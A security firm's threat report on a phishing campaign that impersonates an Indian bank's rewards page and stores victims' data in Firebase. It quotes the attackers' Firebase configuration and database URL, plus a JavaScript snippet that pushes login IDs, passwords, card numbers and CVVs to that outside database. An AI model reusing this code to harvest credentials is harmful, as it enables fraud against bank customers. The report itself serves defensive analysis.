iZOOlogic’s security team has uncovered a phishing attack targeting the customers of a particular Indian financial services company. Our investigation revealed that this campaign uses a fraudulent mobile-optimised website hosted on Cloudflare’s pages.dev platform to lure unsuspecting users into providing sensitive credentials.
Once victims enter their information, the campaign will capture the details in real time and store them using Google’s Firebase Realtime Database.
The compromised company is an Indian-based multinational banking and financial services firm. Its headquarters is in Mumbai, and it is currently the home of more than 100,000 employees.
The phishing attack used an impersonation tactic to offer the fake rewards program.
This phishing attack operates through a specially crafted website that mimics the Indian financial service company’s website, which also offers an official rewards program page. The hackers designed the fake site to deceive mobile users into providing login credentials, credit card details, and mobile numbers for their bank accounts.
Key Tactics Used in this Attack
1. Deceptive URL Structure: The phishing URL resembled the affected firm’s official rewards link hosted on the reputable Cloudflare pages.dev platform.
2. Firebase Database for Real-Time Data Collection: A notable aspect of this attack is its use of Firebase Realtime Database for storing stolen data. Firebase, a cloud-based service by Google, allows data to be captured and stored instantaneously. Attackers embedded Firebase project URLs within the phishing page’s source code, enabling immediate transfer of credentials entered by victims to Firebase.
Typically, Firebase Realtime Database URLs follow this format:
vbnet
Copy code
https://<project-id>-default-rtdb.firebaseio.com/.json
The project ID yhuth-3f193 found in the phishing website’s source code would yield a database access URL of https://yhuth-3f193-default-rtdb.firebaseio.com/.json. The .json suffix is essential in this setup, as it allows data to be fetched in JSON format directly from the Firebase API.
3. Mobile-Optimised Design: The phishing site is optimised for mobile devices, making it harder for users to identify red flags. Attackers have meticulously replicated the Indian Banking company’s branding, such as colour schemes, logos, and terminology. This consistency with the financial service provider’s design increases the chance that users will fall for the phishing attempt.
Technical Insights into the Phishing Campaign
A closer inspection of the phishing page’s code reveals a setup involving Firebase’s real-time database, JavaScript, and additional libraries to facilitate data capture and mimic a legitimate banking experience.
Here is a technical breakdown of how this is structured:
- Firebase Configuration: The phishing page contains embedded Firebase API keys and project configuration details to connect directly with the Firebase database.
javascript
Copy code
const firebaseConfig = {
apiKey: “AIzaSyDCzVvz0uVveBUVdT3L3NzTO-NGbeW30wM”,
authDomain: “yhuth-3f193.firebaseapp.com”,
projectId: “yhuth-3f193”,
storageBucket: “yhuth-3f193.appspot.com”,
messagingSenderId: “957618123658”,
appId: “1:957618123658:web:97b9a374a6415b8b480e73”
};
- Real-Time Data Collection: When users submit their credentials, they are immediately pushed into Firebase’s database under a designated collection. Attackers can access and monitor this data through the Firebase Realtime Database console or API.
javascript
Copy code
const dbRef = ref(database, “users”);
push(dbRef, {
LoginID: lc_id,
Password: lpass,
CreditCardNumber: ccnum,
ExpiryDate: date,
CVV: cvv,
CreditCardLimit: limit,
RegisteredMobileNumber: rgmob,
});
Sample case with screenshot of live threat on Firebase database
- Use of Input Libraries for Enhanced Credibility: To lend further authenticity, the attackers used libraries such as cleave.js to format inputs correctly, prompting users to enter data in expected formats (e.g., 10-digit mobile numbers, formatted credit card numbers). This alignment with banking standards fosters user trust.
Indicators of Compromise (IOCs)
Security Implications of the Phishing Attack
The misuse of the Firebase Realtime Database in this attack highlights a troubling trend where cybercriminals exploit trusted cloud platforms for malicious purposes. Moreover, Firebase’s real-time data storage capabilities allow for seamless and immediate capture of sensitive information, reducing the attacker’s need for complex infrastructure.
Our iZOOlogic researchers urge banking customers to follow these critical security practices to guard against phishing attacks. First, they should verify URLs carefully, especially on mobile devices, by checking for official domain patterns and avoiding unfamiliar links.
They should also employ two-factor authentication (2FA) to add another layer of security, as it helps secure accounts even if credentials are compromised. Lastly, promptly reporting suspicious sites to security authorities can help quickly take down malicious sites and alert other users to potential risks.